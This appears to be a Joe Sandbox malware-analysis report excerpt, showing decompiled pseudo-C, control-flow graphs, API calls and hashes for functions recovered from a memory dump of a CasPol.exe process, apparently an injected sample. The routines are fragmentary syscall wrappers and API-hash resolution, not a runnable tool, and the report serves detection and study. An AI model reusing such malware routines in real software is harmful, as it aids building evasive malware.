                                                                                                                                                                                                                                                                                                Total number of Nodes:655
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:79

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 148 40cf93-40cfaf 149 40cfb7-40cfbc 148->149 150 40cfb2 call 420ed3 148->150 151 40cfc2-40cfd0 call 4213f3 149->151 152 40cfbe-40cfc1 149->152 150->149 155 40cfe0-40cff1 call 41f773 151->155 156 40cfd2-40cfdd call 421673 151->156 161 40cff3-40d007 LdrLoadDll 155->161 162 40d00a-40d00d 155->162 156->155 161->162
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0040CF93(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                				char* _v8;
                                                                                                                                                                                                                                                                                                				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                                                                                                                                                                				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                                                                                                                                                                				char _v536;
                                                                                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                                                                                				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                                                                                                                                                                				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_v8 =  &_v536;
                                                                                                                                                                                                                                                                                                				_t15 = E00420ED3( &_v12, 0x104, _a8);
                                                                                                                                                                                                                                                                                                				_t31 = _t30 + 0xc;
                                                                                                                                                                                                                                                                                                				if(_t15 != 0) {
                                                                                                                                                                                                                                                                                                					_t17 = E004213F3(__eflags, _v8);
                                                                                                                                                                                                                                                                                                					_t32 = _t31 + 4;
                                                                                                                                                                                                                                                                                                					__eflags = _t17;
                                                                                                                                                                                                                                                                                                					if(_t17 != 0) {
                                                                                                                                                                                                                                                                                                						E00421673( &_v12, 0);
                                                                                                                                                                                                                                                                                                						_t32 = _t32 + 8;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t18 = E0041F773(_v8);
                                                                                                                                                                                                                                                                                                					_v16 = _t18;
                                                                                                                                                                                                                                                                                                					__eflags = _t18;
                                                                                                                                                                                                                                                                                                					if(_t18 == 0) {
                                                                                                                                                                                                                                                                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                                                                                                                                                                						return _v16;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					return _t18;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					return _t15;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040D005
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                                                                                                                                                                                                                                                • Instruction ID: bbe13f3015e6297afeaca4817b923598490fab2ca7d40facc20e4f3c260de4dd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D50152B1E0020DB7DB10DBE1DC82F9EB3789B14308F0041A6E908A7280F675EB498755
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 163 41e58e-41e5e4 call 41f203 NtCreateFile
                                                                                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                                			E0041E58E(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                                                                                                                                                                				long _t21;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				asm("o16 sub [eax-0x1374aae0], dh");
                                                                                                                                                                                                                                                                                                				_t15 = _a4;
                                                                                                                                                                                                                                                                                                				_t3 = _t15 + 0xa6c; // 0xa6c
                                                                                                                                                                                                                                                                                                				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                                                                                                                                                                                                                                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                                                                                                                                                                				return _t21;
                                                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                                                                                                                                                                                                                                                • Instruction ID: 3e8d1509aa00af463a8d37bfd54f617173c4f7fb56af6955cf88f9c58c8e7bef
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC01CFB2205148AFCB48CF99DC88EEB37A9AF8C354F058248FA4D97241C630EC51CBA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 166 41e593-41e5a9 167 41e5af-41e5e4 NtCreateFile 166->167 168 41e5aa call 41f203 166->168 168->167
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E593(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                                                                                                                                                                				long _t21;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t3 = _a4 + 0xa6c; // 0xa6c
                                                                                                                                                                                                                                                                                                				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                                                                                                                                                                                                                                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                                                                                                                                                                				return _t21;
                                                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                • Instruction ID: 2b5a8fab2cb6a3536000231a5b839166af3a1201867cde8835e6817bdec1c646
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 169 41e63d-41e659 170 41e65f-41e68c NtReadFile 169->170 171 41e65a call 41f203 169->171 171->170
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                                                                                                                                                                                                                                                • Instruction ID: 0c08c0e38f336dbbf35a67dda85729340189d9c1c2ca355851ac7bf132b3d8ce
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06F0CFB2200108ABCB14DF99DC85EEB7BA9EF8C354F158249FA0DA7241C630E911CBA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 172 41e643-41e68c call 41f203 NtReadFile
                                                                                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                			E0041E643(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t27;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t3 = _a4 + 0xa74; // 0xa76
                                                                                                                                                                                                                                                                                                				_t27 = _t3;
                                                                                                                                                                                                                                                                                                				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                                                                                                                                                                                                                                                                				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                                                                                                                                                                                                                                                                				return _t18;
                                                                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                • Instruction ID: aa4a829568f7423d39f4ec96ffd58af37ce6892a559b0f629fddbcd99df9d704
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BE0DA7241C630E8118BA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 175 41e76d-41e7b0 call 41f203 NtAllocateVirtualMemory
                                                                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                                			E0041E76D(void* __edx, void* __fp0, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28, void* _a115) {
                                                                                                                                                                                                                                                                                                				intOrPtr _v117;
                                                                                                                                                                                                                                                                                                				long _t17;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				asm("out 0xd1, al");
                                                                                                                                                                                                                                                                                                				_v117 = _v117 + __edx;
                                                                                                                                                                                                                                                                                                				_t13 = _a4;
                                                                                                                                                                                                                                                                                                				_t5 = _t13 + 0x14; // 0x6ad04d03
                                                                                                                                                                                                                                                                                                				_t6 = _t13 + 0xa8c; // 0x404083
                                                                                                                                                                                                                                                                                                				E0041F203( *_t5, _a4, _t6,  *_t5, 0, 0x30);
                                                                                                                                                                                                                                                                                                				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                                                                                                                                                                				return _t17;
                                                                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                                                                                                                                                                                                                                                • Instruction ID: 864ad69e3011cdc826fcdf3463504ce9b0c8951d6cc57d2b8f66622e5bcdf5d0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3F034B2600208ABCB14DF98CC41EEB37ADAF88354F118119FE0997252C630E815CBA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 178 41e773-41e789 179 41e78f-41e7b0 NtAllocateVirtualMemory 178->179 180 41e78a call 41f203 178->180 180->179
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E773(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                                                                                                                                                                				long _t14;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t10 = _a4;
                                                                                                                                                                                                                                                                                                				_t2 = _t10 + 0x14; // 0x6ad04d03
                                                                                                                                                                                                                                                                                                				_t3 = _t10 + 0xa8c; // 0x404083
                                                                                                                                                                                                                                                                                                				E0041F203( *_t2, _a4, _t3,  *_t2, 0, 0x30);
                                                                                                                                                                                                                                                                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                                                                                                                                                                				return _t14;
                                                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                                                                                                                                                                                                • Instruction ID: 1b90bcd36e8a78153eba8f51a40a1fce6fab4eed9a3e5dfa1b1f9faf88a12c54
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13F01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159FE0897241C630F811CBB4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E6C3(intOrPtr _a4, void* _a8) {
                                                                                                                                                                                                                                                                                                				long _t8;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                                                                                                                                                                                                                                                                				_t8 = NtClose(_a8); // executed
                                                                                                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                                                                0x0041e6da
                                                                                                                                                                                                                                                                                                0x0041e6e8
                                                                                                                                                                                                                                                                                                0x0041e6ec

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
E0041E6BE(void* __edi, void* __esi, intOrPtr _a4, void* _a8) {
	long _t9;

	_t6 = _a4;
	E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t6, _t6 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
	_t9 = NtClose(_a8); // executed
	return _t9;
}




                                                                                                                                                                                                                                                                                                0x0041e6c6
                                                                                                                                                                                                                                                                                                0x0041e6da
                                                                                                                                                                                                                                                                                                0x0041e6e8
                                                                                                                                                                                                                                                                                                0x0041e6ec

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                                                                                                                                                                			E0040990D(void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                                                                                                                                                                				char _v63;
                                                                                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                                                                                				char _v68;
                                                                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                                                                                                                				long _t30;
                                                                                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t43 = __eflags;
                                                                                                                                                                                                                                                                                                				_pop(_t38);
                                                                                                                                                                                                                                                                                                				asm("sbb al, 0x83");
                                                                                                                                                                                                                                                                                                				asm("les edx, [ebp-0x75]");
                                                                                                                                                                                                                                                                                                				_t36 = _t38;
                                                                                                                                                                                                                                                                                                				_v64 = 0;
                                                                                                                                                                                                                                                                                                				E004201D3( &_v63, 0, 0x3f);
                                                                                                                                                                                                                                                                                                				E00420C83( &_v64, 3);
                                                                                                                                                                                                                                                                                                				_t19 = _a4;
                                                                                                                                                                                                                                                                                                				_t13 = E0040CF93(_t43, _a4 + 0x20,  &_v68); // executed
                                                                                                                                                                                                                                                                                                				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
                                                                                                                                                                                                                                                                                                				_t33 = _t15;
                                                                                                                                                                                                                                                                                                				if(_t33 != 0) {
                                                                                                                                                                                                                                                                                                					_t30 = _a8;
                                                                                                                                                                                                                                                                                                					_t15 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
                                                                                                                                                                                                                                                                                                					if(_t15 == 0) {
                                                                                                                                                                                                                                                                                                						_t15 =  *_t33(_t30, 0x8003, _t36 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return _t15;
                                                                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
